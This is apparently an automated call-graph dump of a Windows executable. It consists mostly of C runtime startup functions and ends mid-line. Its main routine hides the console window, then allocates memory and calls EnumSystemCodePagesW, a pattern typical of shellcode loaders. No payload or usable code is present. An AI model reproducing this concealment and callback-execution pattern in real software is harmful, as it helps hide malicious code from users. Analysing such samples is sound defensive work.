406ba6 7822 40456d __calloc_crt 55 API calls 7821->7822 7823 406bb0 EncodePointer 7822->7823 7824 406bc9 7823->7824 7567 401687 7570 403c2e 7567->7570 7569 40168c 7569->7569 7571 403c51 7570->7571 7572 403c5e GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter 7570->7572 7571->7572 7573 403c55 7571->7573 7572->7573 7573->7569 6042 40150c 6043 401518 __ioinit 6042->6043 6077 4033df GetProcessHeap 6043->6077 6045 40156d 6046 401578 6045->6046 6154 401660 6045->6154 6078 40304b 6046->6078 6049 40157e 6050 401589 __RTC_Initialize 6049->6050 6051 401660 _fast_error_exit 55 API calls 6049->6051 6099 4033f4 6050->6099 6051->6050 6053 401598 6054 4015a4 GetCommandLineW 6053->6054 6055 401660 _fast_error_exit 55 API calls 6053->6055 6118 403d0a GetEnvironmentStringsW 6054->6118 6057 4015a3 6055->6057 6057->6054 6060 4015be 6061 4015c9 6060->6061 6162 403128 6060->6162 6128 4038e5 6061->6128 6065 4015da 6142 403162 6065->6142 6067 403128 __lock 55 API calls 6067->6065 6068 4015e2 6069 4015ed 6068->6069 6070 403128 __lock 55 API calls 6068->6070 6148 401000 GetConsoleWindow ShowWindow 6069->6148 6070->6069 6072 40160a 6073 40161c 6072->6073 6169 4033cb 6072->6169 6172 403153 6073->6172 6076 401621 __ioinit 6077->6045 6175 4031fa RtlEncodePointer 6078->6175 6080 403050 6181 4044e7 6080->6181 6083 403059 6185 4030c1 6083->6185 6088 403076 6197 40456d 6088->6197 6091 4030b8 6093 4030c1 __mtterm 58 API calls 6091->6093 6095 4030bd 6093->6095 6094 403097 6094->6091 6096 40309d 6094->6096 6095->6049 6206 402f98 6096->6206 6098 4030a5 GetCurrentThreadId 6098->6049 6100 403400 __ioinit 6099->6100 6101 4043b6 __lock 55 API calls 6100->6101 6102 403407 6101->6102 6103 40456d __calloc_crt 55 API calls 6102->6103 6104 403418 6103->6104 6105 403483 GetStartupInfoW 6104->6105 6106 403423 __ioinit @_EH4_CallFilterFunc@8 6104->6106 6112 403498 6105->6112 6113 4035c7 6105->6113 6106->6053 6107 40368f 6460 40369f 6107->6460 6109 40456d __calloc_crt 55 API calls 6109->6112 6110 403614 GetStdHandle 6110->6113 6111 403627 GetFileType 6111->6113 6112->6109 6112->6113 6114 4034e6 6112->6114 6113->6107 6113->6110 6113->6111 6117 403de5 __ioinit InitializeCriticalSectionAndSpinCount 6113->6117 6114->6113 6115 40351a GetFileType 6114->6115 6116 403de5 __ioinit InitializeCriticalSectionAndSpinCount 6114->6116 6115->6114 6116->6114 6117->6113 6119 4015b4 6118->6119 6120 403d1b 6118->6120 6124 4036a8 GetModuleFileNameW 6119->6124 6121 4045b5 __malloc_crt 55 API calls 6120->6121 6122 403d41 _memmove 6121->6122 6123 403d57 FreeEnvironmentStringsW 6122->6123 6123->6119 6125 4036dc _wparse_cmdline 6124->6125 6126 4045b5 __malloc_crt 55 API calls 6125->6126 6127 40371c _wparse_cmdline 6125->6127 6126->6127 6127->6060 6129 4038fe __wsetenvp 6128->6129 6133 4015cf 6128->6133 6130 40456d __calloc_crt 55 API calls 6129->6130 6138 403927 __wsetenvp 6130->6138 6131 40397e 6132 404535 _free 55 API calls 6131->6132 6132->6133 6133->6065 6133->6067 6134 40456d __calloc_crt 55 API calls 6134->6138 6135 4039a3 6136 404535 _free 55 API calls 6135->6136 6136->6133 6137 406f70 __wsetenvp 55 API calls 6137->6138 6138->6131 6138->6133 6138->6134 6138->6135 6138->6137 6139 4039ba 6138->6139 6140 4017fe __invoke_watson 8 API calls 6139->6140 6141 4039c6 6140->6141 6143 40316e __IsNonwritableInCurrentImage 6142->6143 6464 406ce6 6143->6464 6145 40318c __initterm_e 6147 4031ab _doexit __IsNonwritableInCurrentImage 6145->6147 6467 406cd1 6145->6467 6147->6068 6530 40142d 6148->6530 6155 401671 6154->6155 6156 40166c 6154->6156 6158 403a24 __NMSG_WRITE 55 API calls 6155->6158 6157 4039c7 __FF_MSGBANNER 55 API calls 6156->6157 6157->6155 6159 401679 6158->6159 6160 403112 _fast_error_exit 3 API calls 6159->6160 6161 401683 6160->6161 6161->6046 6163 4039c7 __FF_MSGBANNER 55 API calls 6162->6163 6164 403130 6163->6164 6165 403a24 __NMSG_WRITE 55 API calls 6164->6165 6166 403138 6165->6166 7231 4031e6 6166->7231 6170 40329c _doexit 55 API calls 6169->6170 6171 4033da 6170->6171 6171->6073 6173 40329c _doexit 55 API calls 6172->6173 6174 40315e 6173->6174 6174->6076 6216 406d2b 6175->6216 6177 40320b __init_pointers __initp_misc_winsig 6217 40614b EncodePointer 6177->6217 6179 403223 __init_pointers 6180 403e53 34 API calls 6179->6180 6180->6080 6182 4044f3 6181->6182 6184 403055 6182->6184 6218 403de5 6182->6218 6184->6083 6194 403d67 6184->6194 6186 4030cb 6185->6186 6188 4030d1 6185->6188 6221 403d85 6186->6221 6189 404400 DeleteCriticalSection 6188->6189 6190 40441c 6188->6190 6224 404535 6189->6224 6192 404428 DeleteCriticalSection 6190->6192 6193 40305e 6190->6193 6192->6190 6193->6049 6195 40306b 6194->6195 6196 403d7e TlsAlloc 6194->6196 6195->6083 6195->6088 6198 404574 6197->6198 6200 403083 6198->6200 6202 404592 6198->6202 6250 408120 6198->6250 6200->6091 6203 403dc3 6200->6203 6202->6198 6202->6200 6257 4040ec Sleep 6202->6257 6204 403dd9 6203->6204 6205 403ddd TlsSetValue 6203->6205 6204->6094 6205->6094 6207 402fa4 __ioinit 6206->6207 6258 4043b6 6207->6258 6209 402fe1 6265 403039 6209->6265 6212 4043b6 __lock 55 API calls 6213 403002 ___addlocaleref 6212->6213 6268 403042 6213->6268 6215 40302d __ioinit 6215->6098 6216->6177 6217->6179 6219 403e02 InitializeCriticalSectionAndSpinCount 6218->6219 6220 403df5 6218->6220 6219->6182 6220->6182 6222 403d98 6221->6222 6223 403d9c TlsFree 6221->6223 6222->6188 6223->6188 6225 40453e HeapFree 6224->6225 6229 404567 _free 6224->6229 6226 404553 6225->6226 6225->6229 6230 4024c9 6226->6230 6229->6188 6233 402f29 GetLastError 6230->6233 6232 4024ce GetLastError 6232->6229 6247 403da4 6233->6247 6235 402f3e 6236 402f8c SetLastError 6235->6236 6237 40456d __calloc_crt 52 API calls 6235->6237 6236->6232 6238 402f51 6237->6238 6238->6236 6239 403dc3 __getptd_noexit TlsSetValue 6238->6239 6240 402f65 6239->6240 6241 402f83 6240->6241 6242 402f6b 6240->6242 6244 404535 _free 52 API calls 6241->6244 6243 402f98 __initptd 52 API calls 6242->6243 6245 402f73 GetCurrentThreadId 6243->6245 6246 402f89 6244->6246 6245->6236 6246->6236 6248 403dbb TlsGetValue 6247->6248 6249 403db7 6247->6249 6248->6235 6249->6235 6251 40812b 6250->6251 6254 408146 _malloc 6250->6254 6252 408137 6251->6252 6251->6254 6255 4024c9 ___strgtold12_l 54 API calls 6252->6255 6253 408156 HeapAlloc 6253->6254 6256 40813c 6253->6256 6254->6253 6254->6256 6255->6256 6256->6198 6257->6202 6259 4043c7 6258->6259 6260 4043da EnterCriticalSection 6258->6260 6271 40443e 6259->6271 6260->6209 6262 4043cd 6262->6260 6263 403128 __lock 54 API calls 6262->6263 6264 4043d9 6263->6264 6264->6260 6458 404520 LeaveCriticalSection 6265->6458 6267 402ffb 6267->6212 6459 404520 LeaveCriticalSection 6268->6459 6270 403049 6270->6215 6272 40444a __ioinit 6271->6272 6285 404469 6272->6285 6293 4039c7 6272->6293 6278 404496 6284 4043b6 __lock 55 API calls 6278->6284 6279 404487 6283 4024c9 ___strgtold12_l 55 API calls 6279->6283 6280 40448c __ioinit 6280->6262 6283->6280 6286 40449d 6284->6286 6285->6280 6335 4045b5 6285->6335 6287 4044c2 6286->6287 6288 4044aa 6286->6288 6289 404535 _free 55 API calls 6287->6289 6290 403de5 __ioinit InitializeCriticalSectionAndSpinCount 6288->6290 6291 4044b6 6289->6291 6290->6291 6341 4044de 6291->6341 6344 403bee 6293->6344 6295 4039ce 6296 4039db 6295->6296 6298 403bee __FF_MSGBANNER 55 API calls 6295->6298 6297 403a24 __NMSG_WRITE 55 API calls 6296->6297 6301 4039fd 6296->6301 6299 4039f3 6297->6299 6298->6296 6300 403a24 __NMSG_WRITE 55 API calls 6299->6300 6300->6301 6302 403a24 6301->6302 6303 403a42 __NMSG_WRITE 6302->6303 6304 403bee __FF_MSGBANNER 52 API calls 6303->6304 6331 403b69 6303->6331 6306 403a55 6304->6306 6308 403b6e GetStdHandle 6306->6308 6309 403bee __FF_MSGBANNER 52 API calls 6306->6309 6307 403bd2 6332 403112 6307->6332 6312 403b7c _strlen 6308->6312 6308->6331 6310 403a66 6309->6310 6310->6308 6311 403a78 6310->6311 6311->6331 6374 406f70 6311->6374 6314 403bb5 WriteFile 6312->6314 6312->6331 6314->6331 6316 403aa5 GetModuleFileNameW 6319 403ac5 6316->6319 6323 403ad5 __wsetenvp 6316->6323 6317 403bd6 6318 4017fe __invoke_watson 8 API calls 6317->6318 6321 403be0 6318->6321 6320 406f70 __wsetenvp 52 API calls 6319->6320 6320->6323 6323->6317 6326 403b1b 6323->6326 6383 4070e7 6323->6383 6326->6317 6392 40707b 6326->6392 6327 40707b __NMSG_WRITE 52 API calls 6328 403b52 6327->6328 6328->6317 6329 403b59 6328->6329 6401 4071a5 EncodePointer 6329->6401 6424 40412d 6331->6424 6439 4030de GetModuleHandleExW 6332->6439 6336 4045c3 6335->6336 6338 404480 6336->6338 6340 4045d6 6336->6340 6442 407fe3 6336->6442 6338->6278 6338->6279 6340->6336 6340->6338 6456 4040ec Sleep 6340->6456 6457 404520 LeaveCriticalSection 6341->6457 6343 4044e5 6343->6280 6345 403bf8 6344->6345 6346 4024c9 ___strgtold12_l 55 API calls 6345->6346 6347 403c02 6345->6347 6348 403c1e 6346->6348 6347->6295 6351 4017ee 6348->6351 6354 4017c3 6351->6354 6355 4017d2 6354->6355 6360 4017fe IsProcessorFeaturePresent 6355->6360 6358 4017c3 ___strgtold12_l 8 API calls 6359 4017fa 6358->6359 6359->6295 6361 401809 6360->6361 6366 401691 6361->6366 6365 4017ed 6365->6358 6367 4016ab _memset ___raise_securityfailure 6366->6367 6368 4016cb IsDebuggerPresent 6367->6368 6369 40410f ___raise_securityfailure SetUnhandledExceptionFilter UnhandledExceptionFilter 6368->6369 6371 40178f ___raise_securityfailure 6369->6371 6370 40412d __setmbcp_nolock 6 API calls 6372 4017b2 6370->6372 6371->6370 6373 4040fa GetCurrentProcess TerminateProcess 6372->6373 6373->6365 6375 406f7b 6374->6375 6377 406f89 6374->6377 6375->6377 6381 406fa2 6375->6381 6376 4024c9 ___strgtold12_l 55 API calls 6378 406f93 6376->6378 6377->6376 6379 4017ee ___strgtold12_l 8 API calls 6378->6379 6380 403a98 6379->6380 6380->6316 6380->6317 6381->6380 6382 4024c9 ___strgtold12_l 55 API calls 6381->6382 6382->6378 6387 4070f5 6383->6387 6384 4070f9 6385 4024c9 ___strgtold12_l 55 API calls 6384->6385 6386 4070fe 6384->6386 6391 407129 6385->6391 6386->6326 6387->6384 6387->6386 6389 407138 6387->6389 6388 4017ee ___strgtold12_l 8 API calls 6388->6386 6389->6386 6390 4024c9 ___strgtold12_l 55 API calls 6389->6390 6390->6391 6391->6388 6394 407095 6392->6394 6395 407087 6392->6395 6393 4024c9 ___strgtold12_l 55 API calls 6396 40709f 6393->6396 6394->6393 6395->6394 6399 4070c1 6395->6399 6397 4017ee ___strgtold12_l 8 API calls 6396->6397 6398 403b3b 6397->6398 6398->6317 6398->6327 6399->6398 6400 4024c9 ___strgtold12_l 55 API calls 6399->6400 6400->6396 6402 4071d9 ___crtIsPackagedApp 6401->6402 6403 407298 IsDebuggerPresent 6402->6403 6404 4071e8 LoadLibraryExW 6402->6404 6407 4072a2 6403->6407 6408 4072b0 6403->6408 6405 407225 GetProcAddress 6404->6405 6406 4071ff GetLastError 6404->6406 6409 4072b5 6405->6409 6411 407239 7 API calls 6405->6411 6406->6409 6410 40720e LoadLibraryExW 6406->6410 6407->6408 6412 4072a9 OutputDebugStringW 6407->6412 6408->6409 6418 4072e9 DecodePointer DecodePointer 6408->6418 6422 407301 6408->6422 6415 40412d __setmbcp_nolock 6 API calls 6409->6415 6410->6405 6410->6409 6413 407281 GetProcAddress EncodePointer 6411->6413 6414 407295 6411->6414 6412->6408 6413->6414 6414->6403 6419 407387 6415->6419 6416 407339 DecodePointer 6417 407325 DecodePointer 6416->6417 6420 407340 6416->6420 6417->6409 6418->6422 6419->6331 6420->6417 6423 407351 DecodePointer 6420->6423 6422->6416 6422->6417 6423->6417 6425 404135 6424->6425 6426 404137 IsProcessorFeaturePresent 6424->6426 6425->6307 6428 4073dc 6426->6428 6431 40738b IsDebuggerPresent 6428->6431 6432 4073a0 ___raise_securityfailure 6431->6432 6437 40410f SetUnhandledExceptionFilter UnhandledExceptionFilter 6432->6437 6434 4073a8 ___raise_securityfailure 6438 4040fa GetCurrentProcess TerminateProcess 6434->6438 6436 4073c5 6436->6307 6437->6434 6438->6436 6440 4030f7 GetProcAddress 6439->6440 6441 403109 ExitProcess 6439->6441 6440->6441 6443 40805e _malloc 6442->6443 6449 407fef _malloc 6442->6449 6445 4024c9 ___strgtold12_l 54 API calls 6443->6445 6444 4039c7 __FF_MSGBANNER 54 API calls 6453 407ffa 6444->6453 6455 408056 6445->6455 6446 408022 RtlAllocateHeap 6446->6449 6446->6455 6447 403a24 __NMSG_WRITE 54 API calls 6447->6453 6448 40804a 6450 4024c9 ___strgtold12_l 54 API calls 6448->6450 6449->6446 6449->6448 6452 408048 6449->6452 6449->6453 6450->6452 6451 403112 _fast_error_exit 3 API calls 6451->6453 6454 4024c9 ___strgtold12_l 54 API calls 6452->6454 6453->6444 6453->6447 6453->6449 6453->6451 6454->6455 6455->6336 6456->6340 6457->6343 6458->6267 6459->6270 6463 404520 LeaveCriticalSection 6460->6463 6462 4036a6 6462->6106 6463->6462 6465 406ce9 RtlEncodePointer 6464->6465 6465->6465 6466 406d03 6465->6466 6466->6145 6470 406bd5 6467->6470 6469 406cdc 6469->6147 6471 406be1 __ioinit 6470->6471 6478 40328a 6471->6478 6477 406c08 __ioinit 6477->6469 6479 4043b6 __lock 55 API calls 6478->6479 6480 403291 6479->6480 6481 406c19 DecodePointer DecodePointer 6480->6481 6482 406c46 6481->6482 6483 406bf6 6481->6483 6482->6483 6495 408f85 6482->6495 6492 406c13 6483->6492 6485 406ca9 EncodePointer EncodePointer 6485->6483 6486 406c7d 6486->6483 6489 4045fc __realloc_crt 58 API calls 6486->6489 6490 406c97 EncodePointer 6486->6490 6487 406c58 6487->6485 6487->6486 6502 4045fc 6487->6502 6491 406c91 6489->6491 6490->6485 6491->6483 6491->6490 6526 403293 6492->6526 6496 408fa3 HeapSize 6495->6496 6497 408f8e 6495->6497 6496->6487 6498 4024c9 ___strgtold12_l 55 API calls 6497->6498 6499 408f93 6498->6499 6500 4017ee ___strgtold12_l 8 API calls 6499->6500 6501 408f9e 6500->6501 6501->6487 6505 404603 6502->6505 6504 404640 6504->6486 6505->6504 6507 408075 6505->6507 6525 4040ec Sleep 6505->6525 6508 408089 6507->6508 6509 40807e 6507->6509 6510 408091 6508->6510 6517 40809e _malloc 6508->6517 6511 407fe3 _malloc 55 API calls 6509->6511 6512 404535 _free 55 API calls 6510->6512 6513 408086 6511->6513 6524 408099 _free 6512->6524 6513->6505 6514 4080d6 _malloc 6518 4024c9 ___strgtold12_l 55 API calls 6514->6518 6515 4080a6 HeapReAlloc 6515->6517 6515->6524 6516 408106 6519 4024c9 ___strgtold12_l 55 API calls 6516->6519 6517->6514 6517->6515 6517->6516 6521 4080ee 6517->6521 6518->6524 6520 40810b GetLastError 6519->6520 6520->6524 6522 4024c9 ___strgtold12_l 55 API calls 6521->6522 6523 4080f3 GetLastError 6522->6523 6523->6524 6524->6505 6525->6505 6529 404520 LeaveCriticalSection 6526->6529 6528 40329a 6528->6477 6529->6528 6536 401442 6530->6536 6532 401026 VirtualAlloc 6533 401381 6532->6533 7048 40139c 6533->7048 6535 40104e EnumSystemCodePagesW 6535->6072 6539 40144e __ioinit 6536->6539 6537 401461 6538 4024c9 ___strgtold12_l 55 API calls 6537->6538 6540 401466 6538->6540 6539->6537 6541 401492 6539->6541 6542 4017ee ___strgtold12_l 8 API calls 6540->6542 6555 402714 6541->6555 6552 401471 __ioinit @_EH4_CallFilterFunc@8 6542->6552 6544 401497 6545 4014a0 6544->6545 6546 4014ad 6544->6546 6547 4024c9 ___strgtold12_l 55 API calls 6545->6547 6548 4014d7 6546->6548 6549 4014b7 6546->6549 6547->6552 6570 402833 6548->6570 6550 4024c9 ___strgtold12_l 55 API calls 6549->6550 6550->6552 6552->6532 6556 402720 __ioinit 6555->6556 6557 4043b6 __lock 55 API calls 6556->6557 6558 40272e 6557->6558 6559 4027a9 6558->6559 6563 40443e __mtinitlocknum 55 API calls 6558->6563 6568 4027a2 6558->6568 6588 401a47 6558->6588 6593 401ab1 6558->6593 6561 4045b5 __malloc_crt 55 API calls 6559->6561 6562 4027b0 6561->6562 6566 403de5 __ioinit InitializeCriticalSectionAndSpinCount 6562->6566 6562->6568 6563->6558 6565 40281f __ioinit 6565->6544 6567 4027d6 EnterCriticalSection 6566->6567 6567->6568 6598 40282a 6568->6598 6571 402853 __wopenfile 6570->6571 6572 40286d 6571->6572 6584 402a28 6571->6584 6603 405e31 6571->6603 6573 4024c9 ___strgtold12_l 55 API calls 6572->6573 6574 402872 6573->6574 6575 4017ee ___strgtold12_l 8 API calls 6574->6575 6577 4014e2 6575->6577 6576 402a8b 6611 405d55 6576->6611 6585 401504 6577->6585 6581 405e31 __wcsnicmp 57 API calls 6582 402a40 6581->6582 6583 405e31 __wcsnicmp 57 API calls 6582->6583 6582->6584 6583->6584 6584->6572 6584->6576 7041 401a77 6585->7041 6587 40150a 6587->6552 6589 401a52 6588->6589 6590 401a68 EnterCriticalSection 6588->6590 6591 4043b6 __lock 55 API calls 6589->6591 6590->6558 6592 401a5b 6591->6592 6592->6558 6594 401ad2 LeaveCriticalSection 6593->6594 6595 401abf 6593->6595 6594->6558 6601 404520 LeaveCriticalSection 6595->6601 6597 401acf 6597->6558 6602 404520 LeaveCriticalSection 6598->6602 6600 402831 6600->6565 6601->6597 6602->6600 6604 405ecf 6603->6604 6606 405e43 6603->6606 6614 405ee7 6604->6614 6607 4024c9 ___strgtold12_l 55 API calls 6606->6607 6610 402a21 6606->6610 6608 405e5c 6607->6608 6609 4017ee ___strgtold12_l 8 API calls 6608->6609 6609->6610 6610->6581 6610->6584 6707 405539 6611->6707 6613 405d6e 6613->6577 6615 405efb 6614->6615 6623 405f12 6614->6623 6616 405f02 6615->6616 6618 405f23 6615->6618 6617 4024c9 ___strgtold12_l 55 API calls 6616->6617 6619 405f07 6617->6619 6625 405da9 6618->6625 6621 4017ee ___strgtold12_l 8 API calls 6619->6621 6621->6623 6622 4085bc 57 API calls __towlower_l 6624 405f2e 6622->6624 6623->6610 6624->6622 6624->6623 6626 405dba 6625->6626 6632 405e07 6625->6632 6633 402f11 6626->6633 6629 405de7 6629->6632 6653 40676d 6629->6653 6632->6624 6634 402f29 __getptd_noexit 55 API calls 6633->6634 6635 402f17 6634->6635 6636 403128 __lock 55 API calls 6635->6636 6637 402f24 6635->6637 6636->6637 6637->6629 6638 4063eb 6637->6638 6639 4063f7 __ioinit 6638->6639 6640 402f11 __setmbcp 55 API calls 6639->6640 6641 406400 6640->6641 6642 40642f 6641->6642 6644 406413 6641->6644 6643 4043b6 __lock 55 API calls 6642->6643 6645 406436 6643->6645 6646 402f11 __setmbcp 55 API calls 6644->6646 6665 40646b 6645->6665 6648 406418 6646->6648 6650 406426 __ioinit 6648->6650 6652 403128 __lock 55 API calls 6648->6652 6650->6629 6652->6650 6654 406779 __ioinit 6653->6654 6655 402f11 __setmbcp 55 API calls 6654->6655 6656 406783 6655->6656 6657 4043b6 __lock 55 API calls 6656->6657 6660 406795 6656->6660 6661 4067b3 6657->6661 6658 4067e0 6703 40680a 6658->6703 6659 4067a3 __ioinit 6659->6632 6660->6659 6663 403128 __lock 55 API calls 6660->6663 6661->6658 6664 404535 _free 55 API calls 6661->6664 6663->6659 6664->6658 6666 406476 ___addlocaleref ___removelocaleref 6665->6666 6668 40644a 6665->6668 6666->6668 6672 4061f1 6666->6672 6669 406462 6668->6669 6702 404520 LeaveCriticalSection 6669->6702 6671 406469 6671->6648 6673 40626a 6672->6673 6676 406206 6672->6676 6674 404535 _free 55 API calls 6673->6674 6675 4062b7 6673->6675 6677 40628b 6674->6677 6678 408865 ___free_lc_time 55 API calls 6675->6678 6681 4062e0 6675->6681 6676->6673 6683 404535 _free 55 API calls 6676->6683 6686 406237 6676->6686 6680 404535 _free 55 API calls 6677->6680 6679 4062d5 6678->6679 6682 404535 _free 55 API calls 6679->6682 6685 40629e 6680->6685 6684 40633f 6681->6684 6699 404535 55 API calls _free 6681->6699 6682->6681 6688 40622c 6683->6688 6689 404535 _free 55 API calls 6684->6689 6690 404535 _free 55 API calls 6685->6690 6691 404535 _free 55 API calls 6686->6691 6701 406255 6686->6701 6687 404535 _free 55 API calls 6692 40625f 6687->6692 6693 408702 ___freetlocinfo 55 API calls 6688->6693 6694 406345 6689->6694 6695 4062ac 6690->6695 6696 40624a 6691->6696 6697 404535 _free 55 API calls 6692->6697 6693->6686 6694->6668 6698 404535 _free 55 API calls 6695->6698 6700 4087fe ___free_lconv_num 55 API calls 6696->6700 6697->6673 6698->6675 6699->6681 6700->6701 6701->6687 6702->6671 6706 404520 LeaveCriticalSection 6703->6706 6705 406811 6705->6660 6706->6705 6710 405545 __ioinit 6707->6710 6708 40555b 6709 4024c9 ___strgtold12_l 55 API calls 6708->6709 6711 405560 6709->6711 6710->6708 6712 405591 6710->6712 6713 4017ee ___strgtold12_l 8 API calls 6711->6713 6718 405602 6712->6718 6717 40556a __ioinit 6713->6717 6715 4055ad 6789 4055d6 6715->6789 6717->6613 6719 405622 6718->6719 6793 4084c5 6719->6793 6721 4017fe __invoke_watson 8 API calls 6722 405d54 6721->6722 6724 405539 __wsopen_helper 100 API calls 6722->6724 6723 40563e 6725 405678 6723->6725 6731 40569b 6723->6731 6781 405775 6723->6781 6726 405d6e 6724->6726 6800 402495 6725->6800 6726->6715 6729 4024c9 ___strgtold12_l 55 API calls 6730 40568a 6729->6730 6732 4017ee ___strgtold12_l 8 API calls 6730->6732 6733 405759 6731->6733 6740 405737 6731->6740 6734 405694 6732->6734 6735 402495 __read_nolock 55 API calls 6733->6735 6734->6715 6736 40575e 6735->6736 6737 4024c9 ___strgtold12_l 55 API calls 6736->6737 6738 40576b 6737->6738 6739 4017ee ___strgtold12_l 8 API calls 6738->6739 6739->6781 6803 404fb7 6740->6803 6742 405805 6743 405832 6742->6743 6744 40580f 6742->6744 6821 4054b1 6743->6821 6746 402495 __read_nolock 55 API calls 6744->6746 6747 405814 6746->6747 6749 4024c9 ___strgtold12_l 55 API calls 6747->6749 6748 4058d2 GetFileType 6750 4058dd GetLastError 6748->6750 6751 40591f 6748->6751 6753 40581e 6749->6753 6755 4024a8 __dosmaperr 55 API calls 6750->6755 6831 40524d 6751->6831 6752 4058a0 GetLastError 6826 4024a8 6752->6826 6754 4024c9 ___strgtold12_l 55 API calls 6753->6754 6754->6734 6758 405904 CloseHandle 6755->6758 6760 4058c5 6758->6760 6761 405912 6758->6761 6759 4054b1 ___createFile 3 API calls 6762 405895 6759->6762 6765 4024c9 ___strgtold12_l 55 API calls 6760->6765 6764 4024c9 ___strgtold12_l 55 API calls 6761->6764 6762->6748 6762->6752 6764->6760 6765->6781 6766 405af8 6769 405ccb CloseHandle 6766->6769 6766->6781 6771 4054b1 ___createFile 3 API calls 6769->6771 6772 405cf2 6771->6772 6775 405cfa GetLastError 6772->6775 6772->6781 6773 402495 __read_nolock 55 API calls 6783 4059be 6773->6783 6774 401d04 67 API calls __read_nolock 6774->6783 6776 4024a8 __dosmaperr 55 API calls 6775->6776 6777 405d06 6776->6777 6923 405160 6777->6923 6781->6721 6783->6766 6783->6774 6784 4052f5 57 API calls __lseeki64_nolock 6783->6784 6785 405b75 6783->6785 6849 40842b 6783->6849 6864 40819a 6783->6864 6895 40768f 6783->6895 6784->6783 6786 40842b __close_nolock 58 API calls 6785->6786 6787 405b7c 6786->6787 6788 4024c9 ___strgtold12_l 55 API calls 6787->6788 6788->6781 6790 4055dc 6789->6790 6792 405600 6789->6792 7040 4052cf LeaveCriticalSection 6790->7040 6792->6717 6794 4084e4 6793->6794 6795 4084cf 6793->6795 6794->6723 6796 4024c9 ___strgtold12_l 55 API calls 6795->6796 6797 4084d4 6796->6797 6798 4017ee ___strgtold12_l 8 API calls 6797->6798 6799 4084df 6798->6799 6799->6723 6801 402f29 __getptd_noexit 55 API calls 6800->6801 6802 40249a 6801->6802 6802->6729 6804 404fc3 __ioinit 6803->6804 6805 40443e __mtinitlocknum 55 API calls 6804->6805 6806 404fd4 6805->6806 6807 4043b6 __lock 55 API calls 6806->6807 6808 404fd9 __ioinit 6806->6808 6818 404fe7 6807->6818 6808->6742 6809 405135 6944 405157 6809->6944 6811 4050c7 6812 40456d __calloc_crt 55 API calls 6811->6812 6816 4050d0 6812->6816 6813 405067 EnterCriticalSection 6815 405077 LeaveCriticalSection 6813->6815 6813->6818 6814 4043b6 __lock 55 API calls 6814->6818 6815->6818 6816->6809 6935 404f29 6816->6935 6818->6809 6818->6811 6818->6813 6818->6814 6820 403de5 __ioinit InitializeCriticalSectionAndSpinCount 6818->6820 6932 40508f 6818->6932 6820->6818 6822 4054bc ___crtIsPackagedApp 6821->6822 6823 4054c0 GetModuleHandleW GetProcAddress 6822->6823 6824 405517 CreateFileW 6822->6824 6825 4054dd 6823->6825 6824->6825 6825->6748 6825->6752 6825->6759 6827 402495 __read_nolock 55 API calls 6826->6827 6828 4024b1 _free 6827->6828 6829 4024c9 ___strgtold12_l 55 API calls 6828->6829 6830 4024c4 6829->6830 6830->6760 6832 4052b5 6831->6832 6833 405259 6831->6833 6834 4024c9 ___strgtold12_l 55 API calls 6832->6834 6833->6832 6835 40527b 6833->6835 6836 4052ba 6834->6836 6837 4052a6 6835->6837 6839 4052a0 SetStdHandle 6835->6839 6838 402495 __read_nolock 55 API calls 6836->6838 6837->6766 6837->6783 6840 4052f5 6837->6840 6838->6837 6839->6837 6952 4051e6 6840->6952 6842 405305 6843 40530d 6842->6843 6844 40531e SetFilePointerEx 6842->6844 6845 4024c9 ___strgtold12_l 55 API calls 6843->6845 6846 405336 GetLastError 6844->6846 6848 405312 6844->6848 6845->6848 6847 4024a8 __dosmaperr 55 API calls 6846->6847 6847->6848 6848->6773 6848->6783 6850 4051e6 __close_nolock 55 API calls 6849->6850 6853 408439 6850->6853 6851 40848f 6852 405160 __free_osfhnd 56 API calls 6851->6852 6858 408497 6852->6858 6853->6851 6855 4051e6 __close_nolock 55 API calls 6853->6855 6863 40846d 6853->6863 6854 4051e6 __close_nolock 55 API calls 6857 408479 CloseHandle 6854->6857 6856 408464 6855->6856 6860 4051e6 __close_nolock 55 API calls 6856->6860 6857->6851 6861 408485 GetLastError 6857->6861 6859 4084b9 6858->6859 6862 4024a8 __dosmaperr 55 API calls 6858->6862 6859->6783 6860->6863 6861->6851 6862->6859 6863->6851 6863->6854 6865 4052f5 __lseeki64_nolock 57 API calls 6864->6865 6866 4081b7 6865->6866 6867 40821c 6866->6867 6868 4052f5 __lseeki64_nolock 57 API calls 6866->6868 6869 4024c9 ___strgtold12_l 55 API calls 6867->6869 6877 408227 6867->6877 6871 4081d3 6868->6871 6869->6877 6870 4082bb 6876 4052f5 __lseeki64_nolock 57 API calls 6870->6876 6892 408321 6870->6892 6871->6867 6871->6870 6872 4081fc GetProcessHeap HeapAlloc 6871->6872 6873 408217 6872->6873 6884 408230 __setmode_nolock 6872->6884 6875 4024c9 ___strgtold12_l 55 API calls 6873->6875 6874 4052f5 __lseeki64_nolock 57 API calls 6874->6867 6875->6867 6878 4082d3 6876->6878 6877->6783 6878->6867 6879 4051e6 __close_nolock 55 API calls 6878->6879 6880 4082e7 SetEndOfFile 6879->6880 6881 408307 6880->6881 6880->6892 6883 4024c9 ___strgtold12_l 55 API calls 6881->6883 6885 40830c 6883->6885 6886 408281 6884->6886 6889 408290 __setmode_nolock 6884->6889 6965 40777e 6884->6965 6888 402495 __read_nolock 55 API calls 6885->6888 6887 402495 __read_nolock 55 API calls 6886->6887 6890 408286 6887->6890 6891 408317 GetLastError 6888->6891 6893 4082a5 GetProcessHeap HeapFree 6889->6893 6890->6889 6894 4024c9 ___strgtold12_l 55 API calls 6890->6894 6891->6892 6892->6867 6892->6874 6893->6892 6894->6889 6896 40769b __ioinit 6895->6896 6897 4076a8 6896->6897 6898 4076bf 6896->6898 6900 402495 __read_nolock 55 API calls 6897->6900 6899 40775e 6898->6899 6901 4076d3 6898->6901 6902 402495 __read_nolock 55 API calls 6899->6902 6903 4076ad 6900->6903 6905 4076f1 6901->6905 6906 4076fb 6901->6906 6907 4076f6 6902->6907 6904 4024c9 ___strgtold12_l 55 API calls 6903->6904 6918 4076b4 __ioinit 6904->6918 6908 402495 __read_nolock 55 API calls 6905->6908 6909 404f29 ___lock_fhandle 56 API calls 6906->6909 6911 4024c9 ___strgtold12_l 55 API calls 6907->6911 6908->6907 6910 407701 6909->6910 6912 407714 6910->6912 6913 407727 6910->6913 6914 40776a 6911->6914 6915 40777e __write_nolock 73 API calls 6912->6915 6917 4024c9 ___strgtold12_l 55 API calls 6913->6917 6916 4017ee ___strgtold12_l 8 API calls 6914->6916 6920 407720 6915->6920 6916->6918 6919 40772c 6917->6919 6918->6783 6921 402495 